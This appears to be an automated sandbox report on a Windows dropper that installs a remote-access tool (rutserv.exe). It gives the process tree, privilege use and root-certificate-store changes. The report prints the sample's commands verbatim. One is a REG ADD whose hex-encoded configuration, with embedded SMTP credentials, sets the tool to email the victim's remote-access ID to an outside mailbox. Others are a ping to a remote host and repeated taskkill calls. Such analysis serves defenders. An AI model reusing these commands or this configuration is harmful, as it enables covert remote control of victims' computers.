Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3416 PING.EXE

pid	process
3416	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmprutserv.exerutserv.exe

pid	process
1780	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
1780	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
1020	rutserv.exe
1020	rutserv.exe
1020	rutserv.exe
1020	rutserv.exe
1020	rutserv.exe
1020	rutserv.exe
1020	rutserv.exe
1020	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe

Suspicious use of AdjustPrivilegeToken 106 IoCs

Processes:

taskkill.exerutserv.exesvchost.exetaskkill.exetaskkill.exetaskkill.exerutserv.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1020	rutserv.exe
Token: SeTcbPrivilege	2840	svchost.exe
Token: SeTcbPrivilege	2840	svchost.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeTakeOwnershipPrivilege	2032	rutserv.exe
Token: SeTcbPrivilege	2032	rutserv.exe
Token: SeDebugPrivilege	2576	taskkill.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	3884	taskkill.exe
Token: SeDebugPrivilege	3924	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	3752	taskkill.exe
Token: SeDebugPrivilege	2360	taskkill.exe
Token: SeDebugPrivilege	2264	taskkill.exe
Token: SeTcbPrivilege	2032	rutserv.exe
Token: SeDebugPrivilege	3956	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	3952	taskkill.exe
Token: SeDebugPrivilege	512	taskkill.exe
Token: SeDebugPrivilege	2228	taskkill.exe
Token: SeDebugPrivilege	3848	taskkill.exe
Token: SeDebugPrivilege	4016	taskkill.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	3784	taskkill.exe
Token: SeDebugPrivilege	1532	taskkill.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	2604	taskkill.exe
Token: SeDebugPrivilege	1672	taskkill.exe
Token: SeDebugPrivilege	4088	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	2644	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	3316	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	2052	taskkill.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	3988	taskkill.exe
Token: SeDebugPrivilege	2760	taskkill.exe
Token: SeDebugPrivilege	3276	taskkill.exe
Token: SeDebugPrivilege	1460	taskkill.exe
Token: SeDebugPrivilege	2140	taskkill.exe
Token: SeDebugPrivilege	3396	taskkill.exe
Token: SeDebugPrivilege	3548	taskkill.exe
Token: SeDebugPrivilege	2740	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	3376	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	2924	taskkill.exe
Token: SeDebugPrivilege	3192	taskkill.exe
Token: SeDebugPrivilege	3256	taskkill.exe
Token: SeDebugPrivilege	1220	taskkill.exe
Token: SeDebugPrivilege	4024	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1112	taskkill.exe
Token: SeDebugPrivilege	3720	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp

pid process

1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

rutserv.exerutserv.exe

pid process

1020 rutserv.exe
1020 rutserv.exe
1020 rutserv.exe
1020 rutserv.exe
2032 rutserv.exe
2032 rutserv.exe
2032 rutserv.exe
2032 rutserv.exe

pid	process
1020	rutserv.exe
1020	rutserv.exe
1020	rutserv.exe
1020	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe

Suspicious use of WriteProcessMemory 333 IoCs

Processes:

ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exeee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmpcmd.execmd.exesvchost.exe

description	pid	process	target process
PID 3984 wrote to memory of 1780	3984	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
PID 3984 wrote to memory of 1780	3984	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
PID 3984 wrote to memory of 1780	3984	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
PID 1780 wrote to memory of 2132	1780	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp	cmd.exe
PID 1780 wrote to memory of 2132	1780	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp	cmd.exe
PID 1780 wrote to memory of 2132	1780	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp	cmd.exe
PID 2132 wrote to memory of 3416	2132	cmd.exe	PING.EXE
PID 2132 wrote to memory of 3416	2132	cmd.exe	PING.EXE
PID 2132 wrote to memory of 3416	2132	cmd.exe	PING.EXE
PID 2132 wrote to memory of 3144	2132	cmd.exe	find.exe
PID 2132 wrote to memory of 3144	2132	cmd.exe	find.exe
PID 2132 wrote to memory of 3144	2132	cmd.exe	find.exe
PID 1780 wrote to memory of 204	1780	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp	cmd.exe
PID 1780 wrote to memory of 204	1780	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp	cmd.exe
PID 1780 wrote to memory of 204	1780	ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp	cmd.exe
PID 204 wrote to memory of 3564	204	cmd.exe	reg.exe
PID 204 wrote to memory of 3564	204	cmd.exe	reg.exe
PID 204 wrote to memory of 3564	204	cmd.exe	reg.exe
PID 204 wrote to memory of 1812	204	cmd.exe	timeout.exe
PID 204 wrote to memory of 1812	204	cmd.exe	timeout.exe
PID 204 wrote to memory of 1812	204	cmd.exe	timeout.exe
PID 204 wrote to memory of 1020	204	cmd.exe	rutserv.exe
PID 204 wrote to memory of 1020	204	cmd.exe	rutserv.exe
PID 204 wrote to memory of 1020	204	cmd.exe	rutserv.exe
PID 204 wrote to memory of 1716	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 1716	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 1716	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2776	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2776	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2776	204	cmd.exe	taskkill.exe
PID 2840 wrote to memory of 2032	2840	svchost.exe	rutserv.exe
PID 2840 wrote to memory of 2032	2840	svchost.exe	rutserv.exe
PID 2840 wrote to memory of 2032	2840	svchost.exe	rutserv.exe
PID 204 wrote to memory of 2112	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2112	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2112	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 4060	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 4060	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 4060	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2576	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2576	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2576	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3524	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3524	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3524	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 1516	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 1516	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 1516	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3884	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3884	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3884	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3924	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3924	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3924	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2596	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2596	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2596	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 1164	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 1164	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 1164	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3752	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3752	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3752	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 2360	204	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe
"C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Users\Admin\AppData\Local\Temp\is-T8S6A.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T8S6A.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp" /SL5="$20120,4482184,721408,C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping -n 2 Ping-ip.hldns.ru|find "TTL="
3⤵
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\SysWOW64\PING.EXE
ping -n 2 Ping-ip.hldns.ru
4⤵
- Runs ping.exe
PID:3416

C:\Windows\SysWOW64\find.exe
find "TTL="
4⤵
PID:3144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""
3⤵
- Suspicious use of WriteProcessMemory
PID:204

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host\Parameters" /f /v "notification" /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313038223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b43434136343745432d313543392d344239392d424538332d4337434346423645353244337d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393130383c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e534d54502e79616e6465782e72753c2f686f73743e3c706f72743e3538373c2f706f72743e3c757365726e616d653e736368616b75726f784079616e6465782e72753c2f757365726e616d653e3c70617373776f72643e6f4e33396a3138786771536a33654b5057444744704b76646a6f38384d66536d3c2f70617373776f72643e3c66726f6d5f656d61696c3e736368616b75726f784079616e6465782e72753c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e706175373838377061754079616e6465782e72753c2f656d61696c3e3c7375626a6563743e496e7465726e65742d494420d181d0b3d0b5d0bdd0b5d180d0b8d180d0bed0b2d0b0d0bd3a20254944253c2f7375626a6563743e3c746578743e2c2c2671756f743b49443a20254944252671756f743b2c2671756f743bd0a1d0b5d180d0b2d0b5d1803a2025534552564552252671756f743b2c2c2671756f743bd098d0bcd18f20d0bfd0bed0bbd18cd0b7d0bed0b2d0b0d182d0b5d0bbd18f3a2025555345524e414d45252671756f743b2c2671756f743bd09dd0b0d0b7d0b2d0b0d0bdd0b8d0b520d0bad0bed0bcd0bfd18cd18ed182d0b5d180d0b03a2025434f4d504e414d45252671756f743b2c2671756f743bd09fd0bed0bbd18cd0b7d0bed0b2d0b0d182d0b5d0bbd18c20d0bfd180d0b5d0b4d181d182d0b0d0b2d0b8d0bbd181d18f20d0bad0b0d0ba3a202553454c464944252671756f743b2c3c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a
4⤵
PID:3564

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3
4⤵
- Delays execution with timeout.exe
PID:1812

C:\ProgramData\Immunity\rutserv.exe
"C:\ProgramData\Immunity\rutserv.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1020

C:\ProgramData\Immunity\rutserv.exe
C:\ProgramData\Immunity\rutserv.exe -second
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2032

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2576

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3884

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3924

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2596

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3752

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2264

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3956

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3952

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:512

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3848

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4016

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2676

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3052

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2644

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3316

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2052

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3820

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3276

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460

C:\Windows\SysWOW64\taskkill.exe
